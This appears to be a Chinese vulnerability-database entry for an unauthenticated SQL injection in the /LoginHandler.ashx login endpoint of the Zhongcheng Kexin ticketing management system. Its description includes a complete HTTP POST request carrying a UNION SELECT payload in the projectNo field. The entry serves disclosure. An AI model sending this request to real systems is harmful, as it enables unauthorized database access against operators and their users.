返回列表

中成科信票务管理系统 /LoginHandler.ashx SQL 注入漏洞

CVE: 暂无

CNVD: 暂无

CNNVD: 暂无

漏洞类型: SQL注入

漏洞等级: 高危

年份: 2026

POC_ID: 94645

漏洞描述

中成科信票务管理系统 /LoginHandler.ashx SQL 注入漏洞接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用SQL 注入漏洞获取数据库中的信息 POST /LoginHandler.ashx HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded Content-Length: 113 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept-Encoding: gzip Connection: close Method=GetSeller&projectNo=1'union+select+1,concat(char(126),char(126),char(77),char(110),char(126),char(126))--+

FOFA 语句

暂无

影响范围

中成科信票务管理系统

漏洞详情

POC: 已公开

漏洞 POC

登录后可查看漏洞 POC。请先登录或注册。

修复建议

暂无

参考来源

https://rss.biu.life/ti/%E4%B8%AD%E6%88%90%E7%A7%91%E4%BF%A1%E7%A5%A8%E5%8A%A1%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20/LoginHandler.ashx%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E